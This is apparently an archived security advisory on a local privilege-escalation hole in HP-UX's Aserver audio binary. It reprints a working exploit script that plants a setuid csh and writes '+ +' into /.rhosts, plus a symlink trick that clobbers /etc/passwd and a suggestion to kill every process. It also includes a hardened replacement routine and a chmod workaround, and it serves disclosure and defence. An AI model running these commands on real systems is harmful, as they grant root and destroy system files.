COMMAND

    /opt/audio/bin/Aserver

SYSTEMS AFFECTED

    HP9000 Series 7/800 running HP-UX releases 10.X and 11.X

PROBLEM

    'Loneguard' posted the following.  It is an Aserver exploit  which
    will create a .rhosts file for you:

        #!/bin/sh
        #
        # HP-UX aserver.sh - Loneguard 18/10/98
        # Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
        #
        cd /var/tmp
        cat << _EOF > ps
        #!/bin/sh
        cp /bin/csh /var/tmp/.foosh
        chmod 4755 /var/tmp/.foosh
        _EOF
        chmod 755 ps
        PATH=.:$PATH
        /opt/audio/bin/Aserver -f
        if [ -e /var/tmp/.foosh ]
        then
                # Hmmm, you not like that technique?
                cd /tmp
                rm last_uuid
                ln -s /.rhosts last_uuid
                /opt/audio/bin/Aserver -f
                echo "+ +" > /.rhosts
                # Haha, my Kungfu is the best!
        fi
        echo Crazy MONKEY!

    Justin Tripp was intrigued by the aserver.sh exploit script posted
    by Loneguard and decided to do  some investigation of his own.  The
    results are as follows:

    1. Aserver will not run on a machine  that does not have audio hard-
       ware, so all beep-only machines are safe (e.g. 705?, 710,  720,
       730, 750, etc.).  800s may or may not have audio hardware  (he
       had little experience with them).  If you try to run Aserver  on
       such a machine it bails out with:

        failed to open /dev/audioIL - Aserver exiting

    2. There are at least  two different (if not  three) versions  of
       Aserver.  Due to Y2K, Justin only had access to two (since almost
       all the machines available had the latest and greatest patches).

        oldmach> what /opt/audio/bin/Aserver
        /opt/audio/bin/Aserver:
        X Window System, Version 11 R5+ HP-UX B.10.10.00 Oct 1998 Patch Release (build date: Wed Oct 14 06:02:49 MDT 1998)

        newmach> what /opt/audio/bin/Aserver
        /opt/audio/bin/Aserver:
        X Window System, Version 11 R5+ HP-UX B.10.10.00 June 1999 Patch Release (build date: Thu Jun  3 22:18:56 MDT 1999)

       The latest patches probably bring your Aserver to the Jun99 ver-
       sion, but the Oct98 version is also fairly current.

    3. Aserver seems to have  some system() calls that  run external
       unix commands.  Running strings on the  binary reveals the nature
       of the commands:

        Oct98
        ps -e | grep Aserver | grep -v grep | grep -v %s  > /dev/null

        Jun99
        /usr/bin/ps -e | /usr/bin/grep Aserver | /usr/bin/grep -v grep | /usr/bin/grep -v %s  > /tmp/null
        kill `awk '{print $1}' /tmp/null` 2>/dev/null

    4. Loneguard's script only  worked partially on the  Oct98 version
       of Aserver, and it does not work at all with the Jun99 version.
       The Jun99 version can be exploited too, but in a different way.

    Loneguard's script uses the fact that the path is not specified  in
    the system() call, so you  can substitute your own version of ps for
    the one that is to be called.  Since you can change the path order-
    ing, it is possible to run whatever commands you want as root.  Jus-
    tin was unable to duplicate the bad permissions on the temporary file
    /tmp/last_uuid: neither version of Aserver had that file name in the
    binary, nor did they seem to create it.

    The Jun99 version foils this by putting the full path in for  every
    command, but it gives you some more weapons that make things just as
    easy.  Instead of ignoring the output, Aserver saves the output into
    the file /tmp/null.  Since it does this via a system() command,  the
    program does not check whether the file already exists, so if  there
    is some troublesome file or something you want to overwrite, simply:

        ln -s /etc/passwd /tmp/null

    And then the file will be overwritten.  Reboot the HP box and it will
    beg you for a root password (seriously).  Unfortunately the only thing
    that goes into /tmp/null is the output from ps -e (but maybe somebody
    can figure out a way to make + + appear in that).

    It is funny that HP fixed the earlier problem of the Oct98 version of
    Aserver in the Jun99 version, but introduced the same problem in  a
    different way.  Aserver -f is used to force Aserver to replace  the
    currently running copy (Aserver has the habit of failing or doing
    weird things).  So the Jun99 version looks for running copies and
    then kills them with the kill statement:

        kill `awk '{print $1}' /tmp/null` 2>/dev/null

    Well, looky here: we can write a script named 'awk', place it before
    /bin in our execution path, and do the same thing with the  Jun99
    version as with the Oct98 one.  An attempt was made to fix it,  but
    it introduced the same bug again...

    The above system call  could also be used  as a process killer.
    Since you can rewrite what awk returns, you could have it echo "-1"
    and take the whole box down.  Feel free to be creative.
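    As an added example, not HP's code and not part of the original posting,
    here is how the Jun99 "kill the running copies" step could have been
    written so that neither the unqualified command trick (ps in Oct98, awk
    in Jun99) nor the fixed /tmp/null scratch file applies.  The command
    locations and the availability of mktemp on HP-UX are assumptions.

```shell
#!/bin/sh
# Added example (not HP's Aserver code, not from the advisory): a hardened
# form of the Jun99 "find and kill other running Aserver copies" step,
# written so that neither PATH poisoning nor a pre-planted /tmp/null applies.
# Assumed: POSIX sh; ps and awk live in /usr/bin or /bin on the target.

# 1. A privileged program must not trust the caller's PATH: pin it, so a
#    ./ps or ./awk planted in the current directory is never found.
PATH=/usr/bin:/bin
export PATH

# Filter "ps -e" output (PID TTY TIME COMMAND) on stdin down to the PIDs of
# other Aserver processes.  $1 is this process's own PID, which is excluded.
# Only all-digit PIDs are accepted, so nothing like "-1" (signal every
# process) or a shell fragment can ever reach the kill below, even if the
# input were tampered with.  Output: PIDs separated by single spaces.
other_aserver_pids() {
    awk -v self="$1" '
        NF == 4 && $4 ~ /(^|\/)Aserver$/ && $1 ~ /^[0-9]+$/ && $1 != self {
            printf "%s%s", sep, $1; sep = " "
        }
        END { if (sep != "") printf "\n" }
    '
}

# 2. Use a pipe instead of a fixed, world-writable scratch file such as
#    /tmp/null, so there is no file for a symlink to redirect.  (If a file
#    were unavoidable, mktemp would be the tool; its presence on HP-UX
#    10.x/11.x is an assumption, not checked here.)
kill_other_aservers() {
    pids=$(ps -e | other_aserver_pids "$$")
    [ -n "$pids" ] || return 0
    kill $pids 2>/dev/null
}

# Typical use from an "Aserver -f" style restart: kill_other_aservers
```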

SOLUTION

    Until a patch is available, the only two temporary fixes currently
    available are to disable /opt/audio/bin/Aserver by removing the file,
    or to change its permissions as follows.  As root, remove the func-
    tionality with:

        chmod 555 /opt/audio/bin/Aserver

    Until a patch that fixes the problem is available, note that instal-
    ling any Aserver patch will restore the original permissions.  It is
    safer to set the 555 permissions each time the system is started.
    One way to do that is to create /sbin/rc2.d/S769audio with 555 per-
    missions containing the following script:

        #!/sbin/sh
        
        PATH=/sbin:/usr/sbin:/usr/bin
        export PATH
        
        case $1 in
        start_msg)
               echo "chmod 555 /opt/audio/bin/Aserver"
               ;;
        
        'start')
               chmod 555 /opt/audio/bin/Aserver
               ;;
        
        *)
               echo "usage: $0 start"
               ;;
        esac
        
        exit 0